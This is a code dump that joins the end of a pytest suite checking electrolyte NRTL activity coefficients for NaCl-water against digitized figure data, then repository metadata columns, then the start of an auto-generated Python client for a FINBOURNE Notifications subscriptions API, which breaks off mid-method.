0.5, rel=1e-8)
assert value(model.state[1].Liq_X["H2O"]) == pytest.approx(
value(model.state[1].Liq_X_ref["H2O"]), rel=1e-8)
assert value(model.state[1].Liq_X["Na+"]) == pytest.approx(
value(model.state[1].Liq_X_ref["Na+"]), rel=1e-8)
assert value(model.state[1].Liq_X["Cl-"]) == pytest.approx(
value(model.state[1].Liq_X_ref["Cl-"]), rel=1e-8)
for v in model.state[1].Liq_Y.values():
assert value(v) == pytest.approx(1, rel=1e-8)
for k, v in model.state[1].Liq_alpha.items():
if k == ("H2O", "H2O"):
assert value(v) == 0.3
else:
assert value(v) == 0.2
assert value(model.state[1].Liq_G["H2O", "H2O"]) == 1
assert value(model.state[1].Liq_G["H2O", "Na+"]) == exp(-0.2*8.885)
assert value(model.state[1].Liq_G["Na+", "H2O"]) == exp(-0.2*-4.549)
assert value(model.state[1].Liq_G["H2O", "Cl-"]) == exp(-0.2*8.885)
assert value(model.state[1].Liq_G["Cl-", "H2O"]) == exp(-0.2*-4.549)
assert value(model.state[1].Liq_G["Na+", "Cl-"]) == 1
assert value(model.state[1].Liq_G["Cl-", "Na+"]) == 1
assert value(model.state[1].Liq_tau["H2O", "H2O"]) == 0
assert value(model.state[1].Liq_tau["H2O", "Na+"]) == pytest.approx(
8.885, rel=1e-8)
assert value(model.state[1].Liq_tau["Na+", "H2O"]) == pytest.approx(
-4.549, rel=1e-8)
assert value(model.state[1].Liq_tau["H2O", "Cl-"]) == pytest.approx(
8.885, rel=1e-8)
assert value(model.state[1].Liq_tau["Cl-", "H2O"]) == pytest.approx(
-4.549, rel=1e-8)
assert value(model.state[1].Liq_tau["Na+", "Cl-"]) == 0
assert value(model.state[1].Liq_tau["Cl-", "Na+"]) == 0
assert (value(model.state[1].Liq_log_gamma_pdh["Na+"]) ==
pytest.approx(0, abs=1e-10))
assert (value(model.state[1].Liq_log_gamma_lc_I["Na+"]) ==
pytest.approx(0, abs=1e-10))
assert (value(model.state[1].Liq_log_gamma_lc_I0["Na+"]) ==
pytest.approx(0, abs=1e-10))
assert (value(model.state[1].Liq_log_gamma_lc_I["Na+"]) ==
pytest.approx(value(model.state[1].Liq_log_gamma_lc_I0["Na+"]),
abs=1e-12))
assert (value(model.state[1].Liq_log_gamma_lc["Na+"]) ==
pytest.approx(0, abs=1e-10))
assert (value(model.state[1].Liq_log_gamma["Na+"]) ==
pytest.approx(0, abs=1e-10))
assert (value(model.state[1].Liq_log_gamma_pdh["Na+"] +
model.state[1].Liq_log_gamma_lc["Na+"]) ==
pytest.approx(
value(model.state[1].Liq_log_gamma["Na+"]), abs=1e-10))
assert pytest.approx(value(
model.state[1].Liq_log_gamma["Na+"]), abs=1e-10) == log(
value(model.state[1].act_coeff_phase_comp["Liq", "Na+"]))
assert (value(model.state[1].Liq_log_gamma_pdh["Cl-"]) ==
pytest.approx(0, abs=1e-10))
assert (value(model.state[1].Liq_log_gamma_lc_I["Cl-"]) ==
pytest.approx(0, abs=1e-10))
assert (value(model.state[1].Liq_log_gamma_lc_I0["Cl-"]) ==
pytest.approx(0, abs=1e-10))
assert (value(model.state[1].Liq_log_gamma_lc_I["Cl-"]) ==
pytest.approx(value(model.state[1].Liq_log_gamma_lc_I0["Cl-"]),
abs=1e-12))
assert (value(model.state[1].Liq_log_gamma_lc["Cl-"]) ==
pytest.approx(0, abs=1e-10))
assert (value(model.state[1].Liq_log_gamma["Cl-"]) ==
pytest.approx(0, abs=1e-10))
assert (value(model.state[1].Liq_log_gamma_pdh["Cl-"] +
model.state[1].Liq_log_gamma_lc["Cl-"]) ==
pytest.approx(
value(model.state[1].Liq_log_gamma["Cl-"]), abs=1e-10))
assert pytest.approx(value(
model.state[1].Liq_log_gamma["Cl-"]), abs=1e-10) == log(
value(model.state[1].act_coeff_phase_comp["Liq", "Cl-"]))
class TestStateBlockUnsymmetric(object):
@pytest.fixture(scope="class")
def model(self):
config = dict(configuration)
eos_opt = config["phases"]["Liq"]["equation_of_state_options"] = {}
eos_opt["reference_state"] = Unsymmetric
m = ConcreteModel()
m.params = GenericParameterBlock(default=config)
m.state = m.params.build_state_block([1])
# Need to set a value of T for checking expressions later
m.state[1].temperature.set_value(298.15)
return m
@pytest.mark.unit
def test_parameters(self, model):
assert model.params.Liq.tau["H2O", "Na+, Cl-"].value == 8.885
assert model.params.Liq.tau["Na+, Cl-", "H2O"].value == -4.549
@pytest.mark.unit
def test_log_gamma_h2o(self, model):
# start with pure water
# Using 0 results in division by zero errors
for k in model.state[1].mole_frac_phase_comp:
model.state[1].mole_frac_phase_comp[k].set_value(1e-12)
# Data digitized from Fig 6 [1]
data = {0.0166772823326004: -1.32412227463648,
0.0368235348413794: -1.29987852737794,
0.0569697873501583: -1.2756347801194,
0.0771212007755797: -1.24850091954107,
0.0972755632962254: -1.21971556563714,
0.117432874912095: -1.18927871840762,
0.137590186527965: -1.1588418711781,
0.157748235417641: -1.12799215061718,
0.177912182497766: -1.09383944340507,
0.198075392304084: -1.06009960952436,
0.218237127562791: -1.02718552230644,
0.238402549190528: -0.992207068431534,
0.255813423719564: -0.964639854693858,
0.315405637317823: -0.854261500929733,
0.335560737112275: -0.825063273694407,
0.355727633287624: -0.789259073156702,
0.375898215832003: -0.751390505962001,
0.396062900185934: -0.716824925418492,
0.416232008182701: -0.67978210488659,
0.436393743441407: -0.646868017668675,
0.45655990234295: -0.611476690462368,
0.476725323970687: -0.576498236587459,
0.496889271050811: -0.542345529375349,
0.517057641773772: -0.505715582174845,
0.537221588853897: -0.471562874962733,
0.557387747755439: -0.436171547756426,
0.57755243210937: -0.401605967212917,
0.597715641915689: -0.367866133332205,
0.617878114448201: -0.334539172782892,
0.638036900611684: -0.303276578890572,
0.658196424048972: -0.271601111666854,
0.678351523843423: -0.242402884431529,
0.698502199995039: -0.215681897184597,
0.718656562515684: -0.186896543280671,
0.7388072386673: -0.160175556033739,
0.758950542080854: -0.137583302100794,
0.779093845494409: -0.11499104816785,
0.799235674360352: -0.0932245408977037,
0.820938311873743: -0.0746252682763595,
0.83951122208037: -0.0542331330027968,
0.887081111079702: -0.0241043023855885,
0.907200084457657: -0.0151368683888049,
0.927323481478448: -0.00369219440362834,
0.947432870296923: -0.0000921137150293738,
0.967534886377337: -0.0006207663404183,
0.982152912433448: -0.00191356230614259,
0.999998: 0}
for x, g in data.items():
model.state[1].mole_frac_phase_comp["Liq", "H2O"].set_value(x)
model.state[1].mole_frac_phase_comp["Liq", "Na+"].set_value(
(1-x)/2)
model.state[1].mole_frac_phase_comp["Liq", "Cl-"].set_value(
(1-x)/2)
assert pytest.approx(g, rel=4.5e-2, abs=0.01) == value(
model.state[1].Liq_log_gamma["H2O"])
assert pytest.approx(g, rel=4.5e-2, abs=0.01) == value(
model.state[1].Liq_log_gamma_appr["H2O"])
@pytest.mark.unit
def test_log_gamma_pdh(self, model):
# start with pure water
# Using 0 results in division by zero errors
for k in model.state[1].mole_frac_phase_comp:
model.state[1].mole_frac_phase_comp[k].set_value(1e-12)
# Data digitized from Fig 6 [1]
data = {0.0102202097143692: -0.934567107147103,
0.030381425381713: -0.931468127697603,
0.0505354137471605: -0.932910302939649,
0.0706887450851628: -0.934765310426382,
0.0908453615603908: -0.934556156689684,
0.110996721816058: -0.937649660910475,
0.131153995318731: -0.93702767492909,
0.151309297739069: -0.937644185681764,
0.171467228269187: -0.936609367455696,
0.191622530689525: -0.937225878208369,
0.211781775274533: -0.935365395492927,
0.231939705804651: -0.934330577266858,
0.252104863636666: -0.92875460434924,
0.321728090914091: -0.933511483051937,
0.34189390577355: -0.927522677889634,
0.36205840657812: -0.922359537216703,
0.382220936300354: -0.91843489327783,
0.402379523857917: -0.916987242807075,
0.422542053580151: -0.913062598868203,
0.442695384918153: -0.914917606354935,
0.462852001393382: -0.914708452618238,
0.48301124597839: -0.912847969902795,
0.503172461645734: -0.909748990453295,
0.523331049203297: -0.908301339982539,
0.543494892980421: -0.903551031554295,
0.563651509455649: -0.903341877817597,
0.583805497821097: -0.904784053059643,
0.603966713488441: -0.901685073610144,
0.624131871320455: -0.896109100692527,
0.644295058070134: -0.891771624508968,
0.664454302655143: -0.889911141793526,
0.684614204267596: -0.887637826833398,
0.704786589401507: -0.877520699224235,
0.724946491013961: -0.875247384264106,
0.74511099181853: -0.870084243591175,
0.765274835595655: -0.865333935162931,
0.785453133976572: -0.851501317351594,
0.805626833165373: -0.840558525253058,
0.827641523255411: -0.824211134895509,
0.84781883609516: -0.8109977654512,
0.868006989887754: -0.790972663969571,
0.888198428817574: -0.768883401264512,
0.90840235126885: -0.738950325910417,
0.928616786159249: -0.702411934641345,
0.948852902955337: -0.652250079297633,
0.968231171867699: -0.565426968552611,
0.981271802390295: -0.43102358298104,
0.994543298706282: -0.295478442814278}
for x, g in data.items():
model.state[1].mole_frac_phase_comp["Liq", "H2O"].set_value(x)
model.state[1].mole_frac_phase_comp["Liq", "Na+"].set_value(
(1-x)/2)
model.state[1].mole_frac_phase_comp["Liq", "Cl-"].set_value(
(1-x)/2)
assert pytest.approx(g, rel=0.04, abs=0.07) == value(
model.state[1].Liq_log_gamma_pdh["Na+"])
assert pytest.approx(g, rel=0.04, abs=0.07) == value(
model.state[1].Liq_log_gamma_pdh["Cl-"])
@pytest.mark.unit
def test_log_gamma_lc(self, model):
# start with pure water
# Using 0 results in division by zero errors
for k in model.state[1].mole_frac_phase_comp:
model.state[1].mole_frac_phase_comp[k].set_value(1e-12)
# Data digitized from Fig 6 [1]
data = {0.00642910940949107: 2.44391469691802,
0.0261925045768978: 2.42178852215264,
0.046347839144311: 2.42099343992118,
0.0665026808921592: 2.41978548440975,
0.086651608805228: 2.41362304953867,
0.106801522357427: 2.40828636122754,
0.126949464631366: 2.40129817979652,
0.147097406905304: 2.39430999836549,
0.167250277374893: 2.39145054973418,
0.187395262731442: 2.38198512862334,
0.207538276809731: 2.3708682143926,
0.227685726264105: 2.36346715968161,
0.24782331932718: 2.3478086393712,
0.267966826225035: 2.33710459842044,
0.288102940829415: 2.32020745827011,
0.308242505170749: 2.30620043107958,
0.328377141316434: 2.28806467108934,
0.348510299003425: 2.26869029125919,
0.36864394950998: 2.24972878470901,
0.388771193362191: 2.2253999255192,
0.408894987477447: 2.1981809533696,
0.429018781592703: 2.17096198122,
0.449137154692745: 2.13920140299072,
0.469255527792787: 2.10744082476143,
0.489368972697179: 2.07155151373244,
0.509481924782006: 2.03524932942348,
0.52958649893423: 1.99192829935501,
0.549690580266888: 1.94819439600656,
0.569786776486507: 1.89785452017858,
0.589878537330041: 1.84379878483086,
0.609963398699666: 1.78396282356355,
0.630044810332336: 1.72123674933644,
0.650120800949792: 1.65396906902965,
0.670193834649858: 1.58422414904303,
0.690261940154275: 1.5103504962567,
0.710324624643477: 1.4319352373907,
0.730382873756595: 1.34980411900495,
0.750435701854498: 1.26313139453952,
0.770486065854576: 1.17439430367423,
0.790531501659005: 1.08152848000924,
0.807210557418041: 1.01934951372455,
0.832434963627757: 0.879209621277547,
0.851556165620075: 0.779608815922458,
0.869765897827013: 0.683966446828523,
0.88797129322178: 0.584690792870842,
0.906174520210461: 0.483598496481289,
0.9243842524174: 0.387956127387353,
0.943499737702764: 0.283565991984599,
0.962618672725083: 0.182065969541643,
0.98081688527469: 0.0767726875283845,
0.99266736005891: 0.0264587394852946}
for x, g in data.items():
model.state[1].mole_frac_phase_comp["Liq", "H2O"].set_value(x)
model.state[1].mole_frac_phase_comp["Liq", "Na+"].set_value(
(1-x)/2)
model.state[1].mole_frac_phase_comp["Liq", "Cl-"].set_value(
(1-x)/2)
assert pytest.approx(g, rel=3e-2, abs=2e-2) == value(
model.state[1].Liq_log_gamma_lc["Na+"])
assert pytest.approx(g, rel=3e-2, abs=2e-2) == value(
model.state[1].Liq_log_gamma_lc["Cl-"])
@pytest.mark.unit
def test_log_gamma(self, model):
# start with pure water
# Using 0 results in division by zero errors
for k in model.state[1].mole_frac_phase_comp:
model.state[1].mole_frac_phase_comp[k].set_value(1e-12)
# Data digitized from Fig 6 [1]
data = {0.01620941361168171: 1.4776225827856462,
0.03630284789262042: 1.4722881224536513,
0.05640439199500977: 1.4714951621340302,
0.07650593609739911: 1.4707022018144094,
0.09660453117380643: 1.468257786944834,
0.11669575368525856: 1.4616847357003733,
0.13678697619671068: 1.4551116844559127,
0.1568759869386763: 1.4473000422989863,
0.17697310750209252: 1.4440299001544339,
0.19706727903952678: 1.4391083034599275,
0.21714891721653726: 1.4271680249281156,
0.2372312926500432: 1.415640610033792,
0.2573195661355132: 1.4074161042393771,
0.27739235723457745: 1.3905214620577024,
0.29747473266808344: 1.378994047163379,
0.3175489982801387: 1.3629251322566815,
0.3376203148662119: 1.3452047628000297,
0.3576997412737358: 1.332025893355752,
0.3777658970643405: 1.3114154784366803,
0.3978268920594765: 1.2879150180551888,
0.41788714979811703: 1.2640016940362084,
0.43794077222829786: 1.2363725972798314,
0.4579907083760012: 1.2066791823360115,
0.47803400921524486: 1.1732699946547944,
0.49807952182397497: 1.1410993978860429,
0.5181139755852725: 1.102735846554963,
0.5381454803205878: 1.0627208406739292,
0.5581718242604347: 1.0198157893304751,
0.5781907956353264: 0.9727821016121361,
0.5982009199322718: 0.9207940502439338,
0.618197773612298: 0.8613744534009378,
0.6381975763183062: 0.8036063111078957,
0.6581877946898728: 0.7404709415275024,
0.6781794875744304: 0.678161299222086,
0.6981645451505283: 0.6121358841792732,
0.718139281135689: 0.5403303782116202,
0.7381140171208497: 0.46852487224396766,
0.7580821177975509: 0.39300359353891734,
0.7780472694482699: 0.3158308602839135,
0.7980079975600158: 0.2361809452039778,
0.8209839409036424: 0.13934585427154245,
0.8379095478581289: 0.06573379683191538,
0.8569581176584067: -0.013013060958402267,
0.8772461460653336: -0.10618700754926813,
0.8913177190714701: -0.15982445783107968,
0.9086308771904323: -0.24383529059164832,
0.928588656276196: -0.3251366602215384,
0.9486120511900609: -0.3696931661149465,
0.9686917233497501: -0.3827344143467273,
0.9855967963455463: -0.3541317749389892,
# Error gets too big at this point
# 0.9946128753251389: -0.19481723605693535
}
for x, g in data.items():
model.state[1].mole_frac_phase_comp["Liq", "H2O"].set_value(x)
model.state[1].mole_frac_phase_comp["Liq", "Na+"].set_value(
(1-x)/2)
model.state[1].mole_frac_phase_comp["Liq", "Cl-"].set_value(
(1-x)/2)
assert pytest.approx(g, rel=3e-2, abs=6e-2) == value(
model.state[1].Liq_log_gamma["Na+"])
assert pytest.approx(g, rel=3e-2, abs=6e-2) == value(
model.state[1].Liq_log_gamma["Cl-"])
assert pytest.approx(g, rel=3e-2, abs=6e-2) == value(
model.state[1].Liq_log_gamma_appr["NaCl"])
@pytest.mark.unit
def test_pure_water(self, model):
# Start by setting all mole fractions to small number
# Using 0 results in division by zero errors
for k in model.state[1].mole_frac_phase_comp:
model.state[1].mole_frac_phase_comp[k].set_value(1e-12)
# Test pure water
model.state[1].mole_frac_phase_comp["Liq", "H2O"].set_value(1)
# Unsymmetric reference state - all ln(gammas) should be 0
for v in model.state[1].Liq_log_gamma.values():
assert value(v) == pytest.approx(0, abs=1e-5)
for v in model.state[1].Liq_log_gamma_pdh.values():
assert value(v) == pytest.approx(0, abs=1e-5)
for v in model.state[1].Liq_log_gamma_lc.values():
assert value(v) == pytest.approx(0, abs=1e-5)
| 47.619048
| 81
| 0.57831
| 4,510
| 42,000
| 5.283814
| 0.151663
| 0.036257
| 0.065548
| 0.053462
| 0.919723
| 0.916911
| 0.907176
| 0.902937
| 0.886446
| 0.882375
| 0
| 0.455339
| 0.299214
| 42,000
| 881
| 82
| 47.673099
| 0.354296
| 0.059143
| 0
| 0.859482
| 0
| 0
| 0.025375
| 0.002163
| 0
| 0
| 0
| 0
| 0.11869
| 1
| 0.023192
| false
| 0
| 0.012278
| 0.001364
| 0.043656
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
105290adcc046294e0a04cc5a6600ce1479b865f
| 46,489
|
py
|
Python
|
sdk/lusid_notifications/api/subscriptions_api.py
|
finbourne/notifications-sdk-python-preview
|
2368e05445c74dc248afc1c98efa9f2ca895de3b
|
[
"MIT"
] | null | null | null |
sdk/lusid_notifications/api/subscriptions_api.py
|
finbourne/notifications-sdk-python-preview
|
2368e05445c74dc248afc1c98efa9f2ca895de3b
|
[
"MIT"
] | null | null | null |
sdk/lusid_notifications/api/subscriptions_api.py
|
finbourne/notifications-sdk-python-preview
|
2368e05445c74dc248afc1c98efa9f2ca895de3b
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
FINBOURNE Notifications API
FINBOURNE Technology # noqa: E501
The version of the OpenAPI document: 0.1.317
Contact: info@finbourne.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from lusid_notifications.api_client import ApiClient
from lusid_notifications.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class SubscriptionsApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_subscription(self, create_subscription, **kwargs): # noqa: E501
"""[EXPERIMENTAL] CreateSubscription: Create a new subscription. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_subscription(create_subscription, async_req=True)
>>> result = thread.get()
:param create_subscription: The data to create a subscription (required)
:type create_subscription: CreateSubscription
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: Subscription
"""
kwargs['_return_http_data_only'] = True
return self.create_subscription_with_http_info(create_subscription, **kwargs) # noqa: E501
def create_subscription_with_http_info(self, create_subscription, **kwargs): # noqa: E501
"""[EXPERIMENTAL] CreateSubscription: Create a new subscription. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_subscription_with_http_info(create_subscription, async_req=True)
>>> result = thread.get()
:param create_subscription: The data to create a subscription (required)
:type create_subscription: CreateSubscription
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(Subscription, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'create_subscription'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_subscription" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'create_subscription' is set
if self.api_client.client_side_validation and ('create_subscription' not in local_var_params or # noqa: E501
local_var_params['create_subscription'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `create_subscription` when calling `create_subscription`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'create_subscription' in local_var_params:
body_params = local_var_params['create_subscription']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
header_params['Accept-Encoding'] = "gzip, deflate, br"
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json-patch+json', 'application/json', 'text/json', 'application/*+json']) # noqa: E501
# set the LUSID header
header_params['X-LUSID-SDK-Language'] = 'Python'
header_params['X-LUSID-SDK-Version'] = '0.1.317'
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
response_types_map = {
201: "Subscription",
400: "LusidValidationProblemDetails",
}
return self.api_client.call_api(
'/api/subscriptions', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def delete_subscription(self, scope, code, **kwargs): # noqa: E501
"""[EXPERIMENTAL] DeleteSubscription: Delete a subscription. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_subscription(scope, code, async_req=True)
>>> result = thread.get()
:param scope: The scope that identifies a subscription (required)
:type scope: str
:param code: The code that identifies a subscription (required)
:type code: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
kwargs['_return_http_data_only'] = True
return self.delete_subscription_with_http_info(scope, code, **kwargs) # noqa: E501
def delete_subscription_with_http_info(self, scope, code, **kwargs): # noqa: E501
"""[EXPERIMENTAL] DeleteSubscription: Delete a subscription. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_subscription_with_http_info(scope, code, async_req=True)
>>> result = thread.get()
:param scope: The scope that identifies a subscription (required)
:type scope: str
:param code: The code that identifies a subscription (required)
:type code: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
local_var_params = locals()
all_params = [
'scope',
'code'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_subscription" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'scope' is set
if self.api_client.client_side_validation and ('scope' not in local_var_params or # noqa: E501
local_var_params['scope'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `scope` when calling `delete_subscription`") # noqa: E501
# verify the required parameter 'code' is set
if self.api_client.client_side_validation and ('code' not in local_var_params or # noqa: E501
local_var_params['code'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `code` when calling `delete_subscription`") # noqa: E501
if self.api_client.client_side_validation and ('scope' in local_var_params and # noqa: E501
len(local_var_params['scope']) > 64): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `delete_subscription`, length must be less than or equal to `64`") # noqa: E501
if self.api_client.client_side_validation and ('scope' in local_var_params and # noqa: E501
len(local_var_params['scope']) < 1): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `delete_subscription`, length must be greater than or equal to `1`") # noqa: E501
if self.api_client.client_side_validation and 'scope' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['scope']): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `delete_subscription`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
if self.api_client.client_side_validation and ('code' in local_var_params and # noqa: E501
len(local_var_params['code']) > 64): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `delete_subscription`, length must be less than or equal to `64`") # noqa: E501
if self.api_client.client_side_validation and ('code' in local_var_params and # noqa: E501
len(local_var_params['code']) < 1): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `delete_subscription`, length must be greater than or equal to `1`") # noqa: E501
if self.api_client.client_side_validation and 'code' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['code']): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `delete_subscription`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'scope' in local_var_params:
path_params['scope'] = local_var_params['scope'] # noqa: E501
if 'code' in local_var_params:
path_params['code'] = local_var_params['code'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
header_params['Accept-Encoding'] = "gzip, deflate, br"
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
response_types_map = {}
return self.api_client.call_api(
'/api/subscriptions/{scope}/{code}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def get_subscription(self, scope, code, **kwargs): # noqa: E501
"""[EXPERIMENTAL] GetSubscription: Get a subscription. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_subscription(scope, code, async_req=True)
>>> result = thread.get()
:param scope: The scope that identifies a subscription (required)
:type scope: str
:param code: The code that identifies a subscription (required)
:type code: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: SubscriptionDetail
"""
kwargs['_return_http_data_only'] = True
return self.get_subscription_with_http_info(scope, code, **kwargs) # noqa: E501
def get_subscription_with_http_info(self, scope, code, **kwargs): # noqa: E501
"""[EXPERIMENTAL] GetSubscription: Get a subscription. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_subscription_with_http_info(scope, code, async_req=True)
>>> result = thread.get()
:param scope: The scope that identifies a subscription (required)
:type scope: str
:param code: The code that identifies a subscription (required)
:type code: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(SubscriptionDetail, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'scope',
'code'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_subscription" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'scope' is set
if self.api_client.client_side_validation and ('scope' not in local_var_params or # noqa: E501
local_var_params['scope'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `scope` when calling `get_subscription`") # noqa: E501
# verify the required parameter 'code' is set
if self.api_client.client_side_validation and ('code' not in local_var_params or # noqa: E501
local_var_params['code'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `code` when calling `get_subscription`") # noqa: E501
if self.api_client.client_side_validation and ('scope' in local_var_params and # noqa: E501
len(local_var_params['scope']) > 64): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `get_subscription`, length must be less than or equal to `64`") # noqa: E501
if self.api_client.client_side_validation and ('scope' in local_var_params and # noqa: E501
len(local_var_params['scope']) < 1): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `get_subscription`, length must be greater than or equal to `1`") # noqa: E501
if self.api_client.client_side_validation and 'scope' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['scope']): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `get_subscription`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
if self.api_client.client_side_validation and ('code' in local_var_params and # noqa: E501
